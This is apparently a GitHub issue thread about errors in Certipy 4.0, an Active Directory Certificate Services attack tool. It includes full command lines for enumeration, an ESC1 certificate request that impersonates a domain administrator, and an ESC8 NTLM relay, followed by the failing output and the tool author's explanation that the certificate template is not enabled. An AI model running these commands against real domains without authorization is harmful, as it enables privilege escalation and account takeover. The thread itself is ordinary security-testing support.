Certipy 4.0 find + ESC1 + ESC8 errors

[C47world]

0/ command certipy find -username john@domain.local -password PAssword -dc-ip 10.10.01.23 -json -debug

OutPut Found... found... Get error while trying to get CA configuration for 'domain-DC-CA' via CSRA.... CASessionError: code: 0x8007000 E_ACCESSDENIED - General access denied error ... Get error while trying to get CA configuration for 'domain-DC-CA' via RRP.... code: 0x5 pc_s_access_denied ... Failed to get CA configuration for 'domain-DC-CA' ... Failed to ookup user with SID 'S-1-.........-36000' saved... saved...

1/ ESC1 command certipy req -username john@domain.local -password Passw0rd -ca domain-DC-CA -target 10.10.01.23 -template ESC1-Test -upn administrator@domain.local -dns DC.domain.local -debug

i got

OutPut

Certipy v4.0.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'domain.LOCAL' at '186.13.77.1' [+] Generating RSA key [] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.01.23[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.01.23[\pipe\cert] [-] Got error while trying to request certificate: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA. [] Request ID is 5715 Would you like to save the private key? (y/N) y [*] Saved private key to 5715.key [-] Failed to request certificate <

if i add -web argument, i have another error Command certipy req -username john@domain.local -password Passw0rd -ca domain-DC-CA -target 10.10.01.23 -template ESC1-Test -upn administrator@domain.local -dns DC.domain.local -web -debug

OutPut

Certipy v4.0.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'domain.LOCAL' at '186.13.77.1' [+] Generating RSA key [] Checking for Web Enrollment on 'http://10.10.01.23:80' [] Requesting certificate via Web Enrollment [-] Template 'ESC1-Test' is not supported by AD CS [-] Failed to request certificate <

2/ when i try to ESC8 i have errors too certipy relay -ca DC.domain.local -debug

[*] Targeting http://DC.domain.local/certsrv/certfnsh.asp [-] Got error: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions Traceback (most recent call last): File "certipy\entry.py", line 60, in main actionsoptions.action File "certipy\commands\parsers\relay.py", line 10, in entry relay.entry(options) File "certipy\commands\relay.py", line 460, in entry relay = Relay(**vars(options)) File "certipy\commands\relay.py", line 424, in init self.server = SMBRelayServer(config) File "impacket\examples\ntlmrelayx\servers\smbrelayserver.py", line 100, in init File "impacket\smbserver.py", line 3941, in init File "socketserver.py", line 452, in init File "socketserver.py", line 466, in server_bind PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions

<

[Muz1K1zuM]

Hi all,

I´m having the same issue:

[+] Trying to resolve 'domain.LOCAL' at '186.13.77.1' [+] Generating RSA key [] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.01.23[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.01.23[\pipe\cert] [-] Got error while trying to request certificate: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA. [] Request ID is 5715 Would you like to save the private key? (y/N) y [*] Saved private key to 5715.key [-] Failed to request certificate

Any news?

[ly4k]

CERTSRV_E_UNSUPPORTED_CERT_TYPE simply means that you're trying to request a certificate based on a template that is not enabled by the CA. So you be having typos or using the display name of the template rather than the actual template name.

[noraj]

In my case it's just that the template are Enabled: False so the CA can't use them.

[ly4k]

@noraj When a template is shown as Enabled: False, it simply means that no CA is configured to issue certificates based on this template. A template itself cannot be disabled, but each CA has a list of templates that it supports.